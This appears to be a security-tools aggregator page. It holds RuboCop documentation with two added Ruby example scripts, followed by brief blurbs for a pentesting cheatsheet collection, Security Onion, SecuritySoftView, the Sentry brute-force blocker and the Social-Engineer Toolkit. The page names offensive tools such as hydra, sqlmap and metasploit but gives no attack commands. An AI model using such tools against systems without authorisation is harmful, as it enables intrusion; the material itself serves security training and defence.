    test.rb:2:3: C: Use a guard clause instead of wrapping the code inside a conditional expression.
      if something
      ^^
    test.rb:2:3: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
      if something
      ^^
    test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2
        end
        ^^^
    
    1 file inspected, 4 offenses detected
    
    For more details check the available command-line options:
    $ rubocop -h
    
    Command flag Description
    -v/--version Displays the current version and exits.
    -V/--verbose-version Displays the current version plus the version of Parser and Ruby.
    -L/--list-target-files List all files RuboCop will inspect.
    -F/--fail-fast Inspects in modification time order and stops after first file with offenses.
    -C/--cache Store and reuse results for faster operation.
    -d/--debug Displays some extra debug output.
    -D/--display-cop-names Displays cop names in offense messages.
    -c/--config Run with specified config file.
    -f/--format Choose a formatter.
    -o/--out Write output to a file instead of STDOUT.
    -r/--require Require Ruby file (see Loading Extensions).
    -R/--rails Run extra Rails cops.
    -l/--lint Run only lint cops.
    -a/--auto-correct Auto-correct certain offenses. Note: Experimental - use with caution.
    --only Run only the specified cop(s) and/or cops in the specified departments.
    --except Run all cops enabled by configuration except the specified cop(s) and/or departments.
    --auto-gen-config Generate a configuration file acting as a TODO list.
    --exclude-limit Limit how many individual files --auto-gen-config can list in Exclude parameters, default is 15.
    --show-cops Shows available cops and their configuration.
    --fail-level Minimum severity for exit with error code. Full severity name or upper case initial can be given. Normally, auto-corrected offenses are ignored. Use A or autocorrect if you'd like them to trigger failure.
    -s/--stdin Pipe source from STDIN. This is useful for editor integration.

    Cops
    In RuboCop lingo the various checks performed on the code are called cops. There are several cop departments.
    You can also load custom cops.

    Style
    Most of the cops in RuboCop are so-called style cops that check for stylistic problems in your code. Almost all of them are based on the Ruby Style Guide. Many of the style cops have configuration options allowing them to support different popular coding conventions.

    Lint
    Lint cops check for possible errors and very bad practices in your code. RuboCop implements in a portable way all built-in MRI lint checks (ruby -wc) and adds a lot of extra lint checks of its own. You can run only the lint cops like this:
    $ rubocop -l
    
    The -l / --lint option can be used together with --only to run all the enabled lint cops plus a selection of other cops.
    Disabling any of the lint cops is generally a bad idea.

    Metrics
    Metrics cops deal with properties of the source code that can be measured, such as class length, method length, etc. Generally speaking, they have a configuration parameter called Max and when running rubocop --auto-gen-config, this parameter will be set to the highest value found for the inspected code.

    Rails
    Rails cops are specific to the Ruby on Rails framework. Unlike style and lint cops they are not used by default and you have to request them specifically:
    $ rubocop -R
    
    or add the following directive to your .rubocop.yml:
    AllCops:
      RunRailsCops: true

    Configuration
    The behavior of RuboCop can be controlled via the .rubocop.yml configuration file. It makes it possible to enable/disable certain cops (checks) and to alter their behavior if they accept any parameters. The file can be placed either in your home directory or in some project directory.
    RuboCop will start looking for the configuration file in the directory where the inspected file is and continue its way up to the root directory.
    The file has the following format:
    inherit_from: ../.rubocop.yml
    
    Style/Encoding:
      Enabled: false
    
    Metrics/LineLength:
      Max: 99
    Note: Qualifying a cop name with its type, e.g., Style, is recommended, but not necessary as long as the cop name is unique across all types.

    Inheritance
    RuboCop supports inheriting configuration from one or more supplemental configuration files at runtime.

    Inheriting from another configuration file in the project
    The optional inherit_from directive is used to include configuration from one or more files. This makes it possible to have the common project settings in the .rubocop.yml file at the project root, and then only the deviations from those rules in the subdirectories. The files can be given with absolute paths or paths relative to the file where they are referenced. The settings after an inherit_from directive override any settings in the file(s) inherited from. When multiple files are included, the first file in the list has the lowest precedence and the last one has the highest. The format for multiple inheritance is:
    inherit_from:
      - ../.rubocop.yml
      - ../conf/.rubocop.yml

    Inheriting configuration from a dependency gem
    The optional inherit_gem directive is used to include configuration from one or more gems external to the current project. This makes it possible to inherit a shared dependency's RuboCop configuration that can be used from multiple disparate projects.
    Configurations inherited in this way will be essentially prepended to the inherit_from directive, such that the inherit_gem configurations will be loaded first, then the inherit_from relative file paths will be loaded (overriding the configurations from the gems), and finally the remaining directives in the configuration file will supersede any of the inherited configurations. This means the configurations inherited from one or more gems have the lowest precedence of inheritance.
    The directive should be formatted as a YAML Hash using the gem name as the key and the relative path within the gem as the value:
    inherit_gem:
      rubocop: config/default.yml
      my-shared-gem: .rubocop.yml
      cucumber: conf/rubocop.yml
    Note: If the shared dependency is declared using a Bundler Gemfile and the gem was installed using bundle install, it is necessary to also invoke RuboCop using Bundler in order to find the dependency's installation path at runtime:
    $ bundle exec rubocop <options...>
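    The precedence rules described above (inherit_gem lowest, then inherit_from files in list order, then the file's own settings on top) are easy to get wrong when several layers set the same cop. The following is an added example, not RuboCop's own configuration loader, that resolves a small constructed set of files with exactly that order. The file contents, the gems/<name>/ root used for inherit_gem paths, and the helper names are assumptions for the illustration (RuboCop itself locates gems through RubyGems/Bundler).

```ruby
require 'yaml'
require 'pathname'

# Constructed stand-ins for the files involved, keyed by project-relative path.
# Assumption: a gem's files live under gems/<name>/. The contents are invented
# for the illustration and are not the real rubocop config/default.yml.
CONFIG_FILES = {
  'gems/rubocop/config/default.yml' => <<~YAML,
    Metrics/LineLength:
      Max: 80
      AllowURI: true
    Style/Encoding:
      Enabled: true
  YAML
  'gems/my-shared-gem/.rubocop.yml' => <<~YAML,
    Metrics/LineLength:
      Max: 100
  YAML
  '.rubocop.yml' => <<~YAML,
    Metrics/LineLength:
      Max: 120
  YAML
  'conf/.rubocop.yml' => <<~YAML,
    Style/Encoding:
      Enabled: false
  YAML
  'app/.rubocop.yml' => <<~YAML
    inherit_gem:
      rubocop: config/default.yml
      my-shared-gem: .rubocop.yml
    inherit_from:
      - ../.rubocop.yml
      - ../conf/.rubocop.yml
    Metrics/LineLength:
      Max: 99
  YAML
}.freeze

def load_yaml(path)
  raw = CONFIG_FILES.fetch(path) { raise ArgumentError, "no such config file: #{path}" }
  YAML.safe_load(raw) || {}
end

# Resolve a path given relative to the file that references it.
def relative_to(path, rel)
  Pathname.new(File.join(File.dirname(path), rel)).cleanpath.to_s
end

# Later wins per parameter; a cop's untouched parameters survive the override.
def merge_configs(base, override)
  base.merge(override) do |_cop, old, new|
    old.is_a?(Hash) && new.is_a?(Hash) ? old.merge(new) : new
  end
end

# inherit_gem sources first (lowest precedence), then inherit_from files in
# list order, then the file's own settings. Sources resolve recursively, so an
# inherited file may itself inherit.
def resolve_config(path)
  own = load_yaml(path)
  gem_sources = (own.delete('inherit_gem') || {}).map { |gem, rel| File.join('gems', gem, rel) }
  file_sources = Array(own.delete('inherit_from')).map { |rel| relative_to(path, rel) }
  inherited = (gem_sources + file_sources).inject({}) do |acc, src|
    merge_configs(acc, resolve_config(src))
  end
  merge_configs(inherited, own)
end

puts YAML.dump(resolve_config('app/.rubocop.yml')) if $PROGRAM_NAME == __FILE__
```

    Resolving app/.rubocop.yml ends with Metrics/LineLength Max 99 (the file's own value beats 120, 100 and 80), AllowURI still true from the lowest layer because parameters merge per cop rather than replacing the whole cop, and Style/Encoding disabled by the second inherit_from file.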
    

    Defaults
    The file config/default.yml under the RuboCop home directory contains the default settings that all configurations inherit from. Project and personal .rubocop.yml files need only make settings that are different from the default ones. If there is no .rubocop.yml file in the project or home directory, config/default.yml will be used.

    Including/Excluding files
    RuboCop checks all files found by a recursive search starting from the directory it is run in, or directories given as command line arguments. However, it only recognizes files ending with .rb or extensionless files with a #!.*ruby declaration as Ruby files. Hidden directories (i.e., directories whose names start with a dot) are not searched by default. If you'd like it to check files that are not included by default, you'll need to pass them in on the command line, or to add entries for them under AllCops / Include . Files and directories can also be ignored through AllCops / Exclude .
    Here is an example that might be used for a Rails project:
    AllCops:
      Include:
        - '**/Rakefile'
        - '**/config.ru'
      Exclude:
        - 'db/**/*'
        - 'config/**/*'
        - 'script/**/*'
        - !ruby/regexp /old_and_unused\.rb$/
    
    # other configuration
    # ...
    Files and directories are specified relative to the .rubocop.yml file.
    Note: Patterns that are just a file name, e.g. Rakefile, will match that file name in any directory, but this pattern style is deprecated. The correct way to match the file in any directory, including the current one, is **/Rakefile.
    Note: The pattern config/** will match any file recursively under config, but this pattern style is deprecated and should be replaced by config/**/*.
    Note: The Include and Exclude parameters are special. They are valid for the directory tree starting where they are defined. They are not shadowed by the setting of Include and Exclude in other .rubocop.yml files in subdirectories. This is different from all other parameters, which follow RuboCop's general principle that configuration for an inspected file is taken from the nearest .rubocop.yml, searching upwards.
    Cops can be run only on specific sets of files when that's needed (for instance you might want to run some Rails model checks only on files whose paths match app/models/*.rb). All cops support the Include param.
    Rails/DefaultScope:
      Include:
        - app/models/*.rb
    Cops can also exclude only specific sets of files when that's needed (for instance you might want to run some cop only on a specific file). All cops support the Exclude param.
    Rails/DefaultScope:
      Exclude:
        - app/models/problematic.rb

    Generic configuration parameters
    In addition to Include and Exclude , the following parameters are available for every cop.

    Enabled
    Specific cops can be disabled by setting Enabled to false for that specific cop.
    Metrics/LineLength:
      Enabled: false
    Most cops are enabled by default. Some cops, configured in config/disabled.yml, are disabled by default. The cop enabling process can be altered by setting DisabledByDefault to true.
    AllCops:
      DisabledByDefault: true
    All cops are then disabled by default, and only cops appearing in user configuration files are enabled. Enabled: true does not have to be set for cops in user configuration. They will be enabled anyway.

    Severity
    Each cop has a default severity level based on which department it belongs to. The level is warning for Lint and convention for all the others. Cops can customize their severity level. Allowed params are refactor, convention, warning, error and fatal.
    There is one exception to the general rule above, and that is Lint/Syntax, a special cop that checks for syntax errors before the other cops are invoked. It cannot be disabled and its severity (fatal) cannot be changed in configuration.
    Metrics/CyclomaticComplexity:
      Severity: warning

    AutoCorrect
    Cops that support the --auto-correct option can have that support disabled. For example:
    Style/PerlBackrefs:
      AutoCorrect: false

    Automatically Generated Configuration
    If you have a code base with an overwhelming amount of offenses, it can be a good idea to use rubocop --auto-gen-config and add an inherit_from: .rubocop_todo.yml in your .rubocop.yml. The generated file .rubocop_todo.yml contains configuration to disable cops that currently detect an offense in the code by excluding the offending files, or disabling the cop altogether once a file count limit has been reached.
    By adding the option --exclude-limit COUNT, e.g., rubocop --auto-gen-config --exclude-limit 5, you can change how many files are excluded before the cop is entirely disabled. The default COUNT is 15.
    Then you can start removing the entries in the generated .rubocop_todo.yml file one by one as you work through all the offenses in the code.

    Disabling Cops within Source Code
    One or more individual cops can be disabled locally in a section of a file by adding a comment such as
    # rubocop:disable Metrics/LineLength, Style/StringLiterals
    [...]
    # rubocop:enable Metrics/LineLength, Style/StringLiterals
    You can also disable all cops with
    # rubocop:disable all
    [...]
    # rubocop:enable all
    One or more cops can be disabled on a single line with an end-of-line comment.
    for x in (0..19) # rubocop:disable Style/AvoidFor

    Formatters
    You can change the output format of RuboCop by specifying formatters with the -f/--format option. RuboCop ships with several built-in formatters, and you can also create your own custom formatter.
    Additionally the output can be redirected to a file instead of $stdout with the -o/--out option.
    Some of the built-in formatters produce machine-parsable output and they are considered public APIs. The rest of the formatters are for humans, so parsing their outputs is discouraged.
    You can enable multiple formatters at the same time by specifying -f/--format multiple times. The -o/--out option applies to the previously specified -f/--format, or to the default progress format if no -f/--format is specified before the -o/--out option.
    # Simple format to $stdout.
    $ rubocop --format simple
    
    # Progress (default) format to the file result.txt.
    $ rubocop --out result.txt
    
    # Both progress and offense count formats to $stdout.
    # The offense count formatter outputs only the final summary,
    # so you'll mostly see the outputs from the progress formatter,
    # and at the end the offense count summary will be outputted.
    $ rubocop --format progress --format offenses
    
    # Progress format to $stdout, and JSON format to the file rubocop.json.
    $ rubocop --format progress --format json --out rubocop.json
    #         ~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~
    #                 |               |_______________|
    #              $stdout
    
    # Progress format to result.txt, and simple format to $stdout.
    $ rubocop --output result.txt --format simple
    #         ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~
    #                  |                 |
    #           default format        $stdout
    You can also load custom formatters.

    Progress Formatter (default)
    The default progress formatter outputs a character for each inspected file, and at the end it displays all detected offenses in the clang format. A . represents a clean file, and each of the capital letters means the severest offense (convention, warning, error or fatal) found in a file.
    $ rubocop
    Inspecting 26 files
    ..W.C....C..CWCW.C...WC.CC
    
    Offenses:
    
    lib/foo.rb:6:5: C: Missing top-level class documentation comment.
        class Foo
        ^^^^^
    
    ...
    
    26 files inspected, 46 offenses detected
    

    Clang Style Formatter
    The clang formatter displays the offenses in a manner similar to clang:
    $ rubocop test.rb
    Inspecting 1 file
    W
    
    Offenses:
    
    test.rb:1:5: C: Use snake_case for method names.
    def badName
        ^^^^^^^
    test.rb:2:3: C: Use a guard clause instead of wrapping the code inside a conditional expression.
      if something
      ^^
    test.rb:2:3: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
      if something
      ^^
    test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2
        end
        ^^^
    
    1 file inspected, 4 offenses detected
    

    Fuubar Style Formatter
    The fuubar style formatter displays a progress bar and shows details of offenses in the clang format as soon as they are detected. This is inspired by the Fuubar formatter for RSpec.
    $ rubocop --format fuubar
    lib/foo.rb.rb:1:1: C: Use snake_case for methods and variables.
    def badName
        ^^^^^^^
    lib/bar.rb:13:14: W: File.exists? is deprecated in favor of File.exist?.
            File.exists?(path)
                 ^^^^^^^
     22/53 files |======== 43 ========>                           |  ETA: 00:00:02
    

    Emacs Style Formatter
    Machine-parsable
    The emacs formatter displays the offenses in a format suitable for consumption by Emacs (and possibly other tools).
    $ rubocop --format emacs test.rb
    /Users/bozhidar/projects/test.rb:1:1: C: Use snake_case for methods and variables.
    /Users/bozhidar/projects/test.rb:2:3: C: Favor modifier if/unless usage when you have a single-line body. Another good alternative is the usage of control flow &&/||.
    /Users/bozhidar/projects/test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2
    

    Simple Formatter
    The name of the formatter says it all :-)
    $ rubocop --format simple test.rb
    == test.rb ==
    C:  1:  5: Use snake_case for method names.
    C:  2:  3: Use a guard clause instead of wrapping the code inside a conditional expression.
    C:  2:  3: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
    W:  4:  5: end at 4, 4 is not aligned with if at 2, 2
    
    1 file inspected, 4 offenses detected
    

    File List Formatter
    Machine-parsable
    Sometimes you might want to just open all files with offenses in your favorite editor. This formatter outputs just the names of the files with offenses in them and makes it possible to do something like:
    $ rubocop --format files | xargs vim
    

    JSON Formatter
    Machine-parsable
    You can get RuboCop's inspection result in JSON format by passing the --format json option on the command line. The JSON structure is like the following example:
    {
      "metadata": {
        "rubocop_version": "0.9.0",
        "ruby_engine": "ruby",
        "ruby_version": "2.0.0",
        "ruby_patchlevel": "195",
        "ruby_platform": "x86_64-darwin12.3.0"
      },
      "files": [{
          "path": "lib/foo.rb",
          "offenses": []
        }, {
          "path": "lib/bar.rb",
          "offenses": [{
              "severity": "convention",
              "message": "Line is too long. [81/80]",
              "cop_name": "LineLength",
              "corrected": true,
              "location": {
                "line": 546,
                "column": 80,
                "length": 4
              }
            }, {
              "severity": "warning",
              "message": "Unreachable code detected.",
              "cop_name": "UnreachableCode",
              "corrected": false,
              "location": {
                "line": 15,
                "column": 9,
                "length": 10
              }
            }
          ]
        }
      ],
      "summary": {
        "offense_count": 2,
        "target_file_count": 2,
        "inspected_file_count": 2
      }
    }
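    Because the JSON formatter is a public API, it is the right input for a CI gate, and the gate has to reproduce the --fail-level rule from the options table above: auto-corrected offenses normally do not count, and only the A/autocorrect level makes them count. The script below is an added example, not part of RuboCop, that consumes the report shown above (embedded as constructed sample input), prints per-cop totals like the offenses formatter, and decides the exit status the way --fail-level does. The helper names and the two-file sample are assumptions for the illustration.

```ruby
require 'json'

# RuboCop severities, lowest to highest. --fail-level takes the full name or
# its upper-case initial, plus 'A'/'autocorrect'.
SEVERITIES = %w[refactor convention warning error fatal].freeze

# Constructed input: the JSON shape documented above, with one auto-corrected
# convention offense and one uncorrected lint warning.
SAMPLE_REPORT = <<~REPORT.freeze
  {
    "metadata": { "rubocop_version": "0.9.0" },
    "files": [
      { "path": "lib/foo.rb", "offenses": [] },
      { "path": "lib/bar.rb", "offenses": [
        { "severity": "convention", "message": "Line is too long. [81/80]",
          "cop_name": "LineLength", "corrected": true,
          "location": { "line": 546, "column": 80, "length": 4 } },
        { "severity": "warning", "message": "Unreachable code detected.",
          "cop_name": "UnreachableCode", "corrected": false,
          "location": { "line": 15, "column": 9, "length": 10 } }
      ] }
    ],
    "summary": { "offense_count": 2, "target_file_count": 2, "inspected_file_count": 2 }
  }
REPORT

# Flatten the per-file structure into one list, keeping the path on each offense.
def offenses(report_json)
  JSON.parse(report_json).fetch('files').flat_map do |file|
    file.fetch('offenses').map { |o| o.merge('path' => file.fetch('path')) }
  end
end

# Per-cop totals, most frequent first (ties alphabetical), like --format offenses.
def offense_counts(report_json)
  offenses(report_json)
    .group_by { |o| o['cop_name'] }
    .map { |cop, list| [cop, list.size] }
    .sort_by { |cop, n| [-n, cop] }
end

# Expand 'W' -> 'warning', 'A' -> 'autocorrect'; reject anything else.
def expand_level(level)
  wanted = level.to_s.downcase
  (SEVERITIES + ['autocorrect']).find { |name| name == wanted || name[0] == wanted } ||
    raise(ArgumentError, "unknown fail level: #{level}")
end

# --fail-level semantics: fail when an uncorrected offense is at or above the
# level; at level autocorrect every offense counts, corrected or not.
def fails?(report_json, level)
  level = expand_level(level)
  all = offenses(report_json)
  return !all.empty? if level == 'autocorrect'

  floor = SEVERITIES.index(level)
  all.any? { |o| !o['corrected'] && (SEVERITIES.index(o['severity']) || 0) >= floor }
end

# Usage in CI:  rubocop --format json | ruby rubocop_gate.rb warning
if $PROGRAM_NAME == __FILE__ && !ARGV.empty?
  report = STDIN.read
  offense_counts(report).each { |cop, n| printf("%-5d %s\n", n, cop) }
  exit(fails?(report, ARGV[0]) ? 1 : 0)
end
```

    With the sample report, gating at warning (or C) fails because of the uncorrected UnreachableCode lint warning, gating at error passes, and a report whose only offense was auto-corrected passes at every level except A, which is the behaviour the --fail-level description promises.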

    Offense Count Formatter
    Sometimes when first applying RuboCop to a codebase, it's nice to be able to see where most of your style cleanup is going to be spent.
    With this in mind, you can use the offense count formatter to outline the offended cops and the number of offenses found for each by running:
    $ rubocop --format offenses
    
    87   Documentation
    12   DotPosition
    8    AvoidGlobalVars
    7    EmptyLines
    6    AssignmentInCondition
    4    Blocks
    4    CommentAnnotation
    3    BlockAlignment
    1    IndentationWidth
    1    AvoidPerlBackrefs
    1    ColonMethodCall
    --
    134  Total
    

    HTML Formatter
    Useful for CI environments. It will create an HTML report like this.
    $ rubocop --format html -o rubocop.html
    

    Compatibility
    RuboCop supports the following Ruby implementations:
    • MRI 1.9.3
    • MRI 2.0
    • MRI 2.1
    • MRI 2.2
    • JRuby in 1.9 mode
    • Rubinius 2.0+

    Editor integration

    Emacs
    rubocop.el is a simple Emacs interface for RuboCop. It allows you to run RuboCop inside Emacs and quickly jump between problems in your code.
    flycheck > 0.9 also supports RuboCop and uses it by default when available.

    Vim
    The vim-rubocop plugin runs RuboCop and displays the results in Vim.
    There's also a RuboCop checker in syntastic.

    Sublime Text
    If you're a ST user you might find the Sublime RuboCop plugin useful.

    Brackets
    The brackets-rubocop extension displays RuboCop results in Brackets. It can be installed via the extension manager in Brackets.

    TextMate2
    The textmate2-rubocop bundle displays formatted RuboCop results in a new window. Installation instructions are provided with the bundle.

    Atom
    The atom-lint package runs RuboCop and highlights the offenses in Atom.
    You can also use the linter-rubocop plugin for Atom's linter.

    LightTable
    The lt-rubocop plugin provides LightTable integration.

    RubyMine
    The rubocop-for-rubymine plugin provides basic RuboCop integration for RubyMine/IntelliJ IDEA.

    Other Editors
    Here's one great opportunity to contribute to RuboCop - implement RuboCop integration for your favorite editor.

    Git pre-commit hook integration
    overcommit is a fully configurable and extendable Git commit hook manager. To use RuboCop with overcommit, add the following to your .overcommit.yml file:
    PreCommit:
      RuboCop:
        enabled: true

    Guard integration
    If you're fond of Guard you might like guard-rubocop . It allows you to automatically check Ruby code style with RuboCop when files are modified.

    Rake integration
    To use RuboCop in your Rakefile add the following:
    require 'rubocop/rake_task'
    
    RuboCop::RakeTask.new
    If you run rake -T, the following two RuboCop tasks should show up:
    rake rubocop                                  # Run RuboCop
    rake rubocop:auto_correct                     # Auto-correct RuboCop offenses
    The above uses default values. To customize the task, pass a block:
    require 'rubocop/rake_task'
    
    desc 'Run RuboCop on the lib directory'
    RuboCop::RakeTask.new(:rubocop) do |task|
      task.patterns = ['lib/**/*.rb']
      # only show the files with failures
      task.formatters = ['files']
      # don't abort rake on failure
      task.fail_on_error = false
    end

    Caching
    Large projects containing hundreds or even thousands of files can take a really long time to inspect, but RuboCop has functionality to mitigate this problem. There's a caching mechanism that stores information about offenses found in inspected files.

    Cache Validity
    Later runs will be able to retrieve this information and present the stored information instead of inspecting the file again. This will be done if the cache for the file is still valid, which it is if there are no changes in:
    • the contents of the inspected file
    • RuboCop configuration for the file
    • the options given to rubocop, with some exceptions that have no bearing on which offenses are reported
    • the Ruby version used to invoke rubocop
    • version of the rubocop program (or to be precise, anything in the source code of the invoked rubocop program)

    Enabling and Disabling the Cache
    The caching functionality is enabled if the configuration parameter AllCops: UseCache is true, which it is by default. The command line option --cache false can be used to turn off caching, thus overriding the configuration parameter. If AllCops: UseCache is set to false in the local .rubocop.yml, then it's --cache true that overrides the setting.

    Cache Path
    By default, the cache is stored in a subdirectory of the temporary directory, /tmp/rubocop_cache/ on Unix-like systems. The configuration parameter AllCops: CacheRootDirectory can be used to set it to a different path. One reason to use this option could be that there's a network disk where users on different machines want to have a common RuboCop cache. Another could be that a Continuous Integration system allows directories, but not a temporary directory, to be saved between runs.

    Cache Pruning
    Each time a file has changed, its offenses will be stored under a new key in the cache. This means that the cache will continue to grow until we do something to stop it. The configuration parameter AllCops: MaxFilesInCache sets a limit, and when the number of files in the cache exceeds that limit, the oldest files will be automatically removed from the cache.

    Extensions
    It's possible to extend RuboCop with custom cops and formatters.

    Loading Extensions
    Besides the --require command line option you can also specify ruby files that should be loaded with the optional require directive in the .rubocop.yml file:
    require:
     - ../my/custom/file.rb
     - rubocop-extension
    Note: The paths are passed directly to Kernel.require. If your extension file is not in $LOAD_PATH, you need to specify the path either as a relative path explicitly prefixed with ./ or as an absolute path.

    Custom Cops
    You can configure the custom cops in your .rubocop.yml just like any other cop.

    Known Custom Cops

    Custom Formatters
    You can customize RuboCop's output format with custom formatters.

    Creating Custom Formatter
    To implement a custom formatter, you need to subclass RuboCop::Formatter::BaseFormatter and override some methods, or implement all formatter API methods by duck typing.
    Please see the documents below for more formatter API details.

    Using Custom Formatter in Command Line
    You can tell RuboCop to use your custom formatter with a combination of the --format and --require options. For example, when you have defined MyCustomFormatter in ./path/to/my_custom_formatter.rb, you would type this command:
    $ rubocop --require ./path/to/my_custom_formatter --format MyCustomFormatter
    


    Download Rubocop

    Security CheatSheets - A collection of cheatsheets for various infosec tools and topics


    These security cheatsheets are part of a project for the Ethical Hacking and Penetration Testing course offered at the University of Florida. Expanding on the default set of cheatsheets, the purpose of these cheatsheets is to aid penetration testers/CTF participants/security enthusiasts in remembering commands that are useful, but not frequently used. Most of the tools that will be covered have been included in our class and are available in Kali Linux.

    Requirements


    How to Use

    In order to use these cheatsheets, the cheatsheets in this repository need to go into the ~/.cheat/ directory. After the files are moved into that directory, cheat ncat will display the ncat cheatsheet.

    CheatSheets:
    • aircrack-ng
    • cewl
    • cidr
    • cookies
    • dig
    • fierce
    • ftp
    • http
    • https-ssl-tls
    • hydra
    • john
    • maltego
    • markdown
    • medusa
    • metasploit
    • mysql
    • ncat
    • nikto
    • nping
    • permissions
    • php
    • pivoting
    • ps
    • python
    • ruby
    • shadow
    • shodan
    • sqlmap
    • tcpdump
    • webservervulns
    • wireless-encryptions
    • wireshark

    Security Onion - Linux Distro For Intrusion Detection, Network Security Monitoring, And Log Management


    Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It's based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!


    Easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes


    Analyze your NIDS/HIDS alerts with Squert


    Pivot between multiple data types with Sguil and send pcaps to Wireshark and NetworkMiner


    Use ELSA to slice and dice your logs


    Access full packet capture with CapMe


    Snort/Suricata and Bro compiled with PF_RING to handle lots of traffic


    Easy updates

    Data Types

    • Alert data - HIDS alerts from OSSEC and NIDS alerts from Snort/Suricata
    • Asset data from Prads and Bro
    • Full content data from netsniff-ng
    • Host data via OSSEC and syslog-ng
    • Session data from Argus, Prads, and Bro
    • Transaction data - http/ftp/dns/ssl/other logs from Bro

    Download Security Onion

    SecuritySoftView - Displays the AntiVirus / AntiSpyware / Firewall registered with the security center of Windows


    SecuritySoftView is a simple tool that displays the AntiVirus, AntiSpyware, and Firewall programs that are currently installed on your system and registered with the security center of the Windows operating system.

    System Requirements

    This utility works on any version of Windows, starting from Windows XP and up to Windows 10. Both 32-bit and 64-bit systems are supported. However, on Windows XP, SecuritySoftView displays less information than Windows Vista or later.

    Start Using SecuritySoftView

    SecuritySoftView doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - SecuritySoftView.exe
    After running SecuritySoftView, the main window displays the list of all AntiVirus/AntiSpyware/Firewall programs that are currently registered with the security center of the Windows operating system. Be aware that the same software might appear more than once, but with a different product type.

    Command-Line Options
    /stext <Filename> Save the list of security programs into a simple text file.
    /stab <Filename> Save the list of security programs into a tab-delimited text file.
    /scomma <Filename> Save the list of security programs into a comma-delimited text file (csv).
    /stabular <Filename> Save the list of security programs into a tabular text file.
    /shtml <Filename> Save the list of security programs into HTML file (Horizontal).
    /sverhtml <Filename> Save the list of security programs into HTML file (Vertical).
    /sxml <Filename> Save the list of security programs into XML file.     


    Download SecuritySoftView

    Sentry - Bruteforce Attack Blocker (ssh, FTP, SMTP, and more)


    Sentry detects and prevents bruteforce attacks against sshd using minimal system resources.

    SAFE

    To prevent inadvertent lockouts, Sentry manages a whitelist of IPs that have connected more than 3 times and succeeded at least once. Never again will that forgetful colleague behind the office NAT router get us locked out of our system. Nor the admin whose script just failed to login 12 times in 2 seconds.

    Sentry includes support for adding IPs to a firewall. Support for IPFW, PF, ipchains is included. Firewall support is disabled by default. This is because firewall rules may terminate existing session(s) to the host (attn IPFW users). Get your IPs whitelisted (connect 3x or use --whitelist) before enabling the firewall option.

    SIMPLE

    Sentry has an extremely simple database for tracking IPs. This makes it very easy for administrators to view and manipulate the database using shell commands and scripts. See the EXAMPLES section.
    Sentry is written in Perl, which is installed everywhere you find sshd. It has no dependencies. Installation and deployment is extremely simple.

    FLEXIBLE

    Sentry supports blocking connection attempts using tcpwrappers and several popular firewalls. It is easy to extend sentry to support additional blocking lists.

    Sentry was written to protect the SSH daemon but anticipates use with other daemons. SMTP support is planned. As this was written, the primary attack platform in use is bot nets comprised of exploited PCs on high-speed internet connections. These bots are used for carrying out SSH attacks as well as spam delivery. Blocking bots prevents multiple attack vectors.

    The programming style of sentry makes it easy to insert code for additional functionality.

    EFFICIENT

    The primary goal of Sentry is to minimize the resources an attacker can steal, while consuming minimal resources itself. Most bruteforce blocking apps (denyhosts, fail2ban, sshdfilter) expect to run as a daemon, tailing a log file. That requires a language interpreter to always be running, consuming at least 10MB of RAM. A single hardware node with dozens of virtual servers will lose hundreds of megs to daemon protection.

    Sentry uses resources only when connections are made. The worst-case scenario is the first connection made by an IP, since it will invoke a perl interpreter. For most connections, Sentry will append a timestamp to a file, stat for the presence of another file, and exit.

    Once an IP is blacklisted for abuse, whether by tcpd or a firewall, the resources it can consume are practically zero.

    Sentry is not particularly efficient for reporting. The "one file per IP" is superbly minimal for logging and blacklisting, but nearly any database would perform better for reporting. Expect to wait a few seconds for sentry --report.


    REQUIRED ARGUMENTS
    • ip
      An IPv4 address. The IP should come from a reliable source that is difficult to spoof. Tcpwrappers is an excellent source. UDP connections are a poor source as they are easily spoofed. The log files of TCP daemons can be a good source if they are parsed carefully to avoid log injection attacks.
    All actions except report and help require an IP address. The IP address can be manually specified by an administrator, or preferably passed in by a TCP server such as tcpd (tcpwrappers), inetd, or tcpserver (daemontools).


    ACTIONS
    • blacklist
      deny all future connections
    • whitelist
      whitelist all future connections, remove the IP from the blacklists, and make it immune to future connection tests.
    • delist
      remove an IP from the white and blacklists. This is useful for testing that sentry is working as expected.
    • connect
      register a connection by an IP. The connect method will log the attempt and the time. See CONNECT.
    • update
      Check the most recent version of sentry against the installed version and update if a newer version is available.


    EXAMPLES

    IP REPORT
    $ /var/db/sentry/sentry.pl -r --ip=24.19.45.95
       9 connections from 24.19.45.95
           and it is whitelisted
    

    HOME GATEWAY REPORT
    $ /var/db/sentry/sentry.pl -r
      -------- summary ---------
      1614 unique IPs have connected 76525 times
      1044 IPs are blacklisted
        18 IPs are whitelisted
    

    WEB SERVER REPORT
    $ /var/db/sentry/sentry.pl -r
     -------- summary ---------
     1240 unique IPs have connected 285554 times
       40 IPs are blacklisted
        4 IPs are whitelisted
    

    EUROPEAN DNS MIRROR
    $ /var/db/sentry/sentry.pl -r
    -------- summary ---------
    3484 unique IPs have connected 15391 times
    1127 IPs are blacklisted
       6 IPs are whitelisted
    


    Download Sentry

    SET v6.5 - The Social-Engineer Toolkit “Mr Robot”


    The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.

